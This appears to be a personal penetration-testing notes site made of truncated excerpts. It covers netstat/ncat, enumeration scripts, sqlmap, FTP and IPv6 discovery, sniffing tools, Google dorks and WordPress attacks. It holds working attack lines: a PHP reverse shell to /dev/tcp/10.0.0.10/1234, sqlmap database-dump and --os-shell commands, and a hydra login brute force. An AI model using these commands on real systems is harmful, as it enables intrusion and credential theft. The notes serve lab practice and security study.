View the routing table: netstat -r
Fast output without DNS resolution, IPs only: netstat -n
Show only TCP connections: netstat -t
Show only UDP connections: netstat -u
Show the program that is using the open connection: netstat -p
Show network statistics: netstat -s
Name confusion
Serve a file: echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000
Request a file over SSL: echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443
Return the output of a program: ncat -l localhost 3000 --exec /bin/date
Transfer a file directly (unencrypted!): 1. Receiver: user@host02:~$ ncat -l > aha or nc -nlvp 4444…
https://github.com/diego-treitos/linux-smart-enumeration This script shows relevant information about the security of the local Linux system. Quick install. Details from the manual: it has 3 levels of verbosity so you can control how much information you see. In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1)…
IF THE METERPRETER SHELL GETS STUCK, TRY PRESSING ENTER MULTIPLE TIMES ON THE VICTIM. Setup: listen on a system that can be reached, e.g. with nc -lnvp 9998 [l=listen, v=verbose, p=port, n=no_resolution]. Then initiate the connection from the target system. Here is an example directly in PHP: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?> Another example, e.g. directly in a console…
Standard case: $ python sqlmap.py -u http://10.10.10.140/index.php/catalogsearch/result/?q=e
More aggressive:
Dump DB: sqlmap -u http://target/command.php?id=564 --dbms=mysql --dump --threads=5
sqlmap -u http://target/command.php?id=564 --dbms=mysql --tables
Get shell: sqlmap -u http://target/command.php?id=564 --dbms=mysql --os-shell
Use an existing HTTP request as a template. E.g. store a request in a text file:
POST /index.php HTTP/1.1
Header: value...
Then use sqlmap with this file request.txt: sqlmap -r…
With knockd a server can be configured to respond only after a sequence of ports has been hit beforehand. It's often used for SSH. Countermeasure: sniff traffic, wait for a user to log in, and reconstruct the knocking pattern from the pcaps.
Note that FTP doesn't show hidden files! On Windows try e.g. "cd ProgramData". Enumeration with nmap: scan a network for FTP servers which allow anonymous access: nmap -v -p21 --script=ftp-anon.nse 10.11.1.1-254 FTP relays: the FTP specification defines FTP relays. One FTP server can tell another FTP server to send files to a third-party server.…
General notes. NC / Netcat: try netcat first on interesting ports or narrow port ranges to be quieter. Network scan: choose a port which is probably open on systems in this network, e.g. 445 for Windows hosts or 22 for Linux hosts. for i in $(seq 1 254); do nc -zv -w 1 10.10.10.$i 445;…
Linux: detect IPv6 hosts. There is no ARP table like in Ethernet/IPv4, but we can simulate it as follows to list all neighbours / directly reachable hosts:
ping6 -c 5 ff02::1%eth0 >/dev/null
ip -6 neigh
Bonus: ip neigh shows the IPv4 address resolution table like the arp command does. Detect IPv6 addresses for known IPv4 addresses. Scenario:…
Like OSXcollector, but for Windows. Collects information on a host for later analysis. https://www.fireeye.com/services/freeware/redline.html
osxcollector http://yelp.github.io/osxcollector/ Stand-alone Python script. Execute it on the Mac that should be analysed. It creates an archive with "everything" interesting, which the victim can hand over to an expert. See Redline for Windows.
See also the Wireshark post. PSnuffle: Metasploit module; analyses live traffic for credentials of various protocols. msf > use auxiliary/sniffer/psnuffle PCredz: PCredz reads a PCAP file and extracts hashes and other credentials. pcredz -f dump.pcap Zeek: GitHub — zeek/zeek: Zeek is a powerful network analysis framework that is much different from the typical IDS you…
Sniffing and live content filtering. Operation modes: Unified: sniffs all packets from one interface. Packets arriving at the attacking host end up here, but are forwarded directly after being received. Bridged: forwards traffic from one interface to another. Absolutely stealthy because there is really no one "between the cable". Usage: ettercap OPTIONS TARGET1 TARGET2 Targets are defined as MAC/IPv4s/IPv6s/PORT…
Passive OS fingerprinting http://tools.kali.org/information-gathering/p0f
Distributed port scanning. Install dnmap_client on many machines and one dnmap_server. The server controls the clients to split up port scans. http://tools.kali.org/information-gathering/dnmap
Active Information Gathering tool. See http://tools.kali.org/information-gathering/dmitry
Analyses SSL. https://github.com/nabla-c0d3/sslyze python -m sslyze --regular URL
=> https://www.exploit-db.com/google-hacking-database
=> https://ahrefs.com/blog/google-advanced-search-operators/
=> https://searchdns.netcraft.com/
GitHub: search for file names within repos of users: user:megacorpone filename:users
Tools: Google
Looking for directory listings: site:URL intitle:index.of
Looking for configuration files: site:URL ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
Looking for database files: site:URL ext:sql | ext:dbf |…
Enumeration: GitHub: wpscan --url $target Maybe an API token could be useful — then the WordPress Vulnerability Database is used. Login brute force: hydra -l thinc -P best110.txt 10.11.1.234 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' Check users: http://spectra.htb/main/?author=1 http://spectra.htb/main/?author=2 … Most beautiful WordPress plugin XSS injection: if there is a way to inject code somewhere (e.g. via a plugin)…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';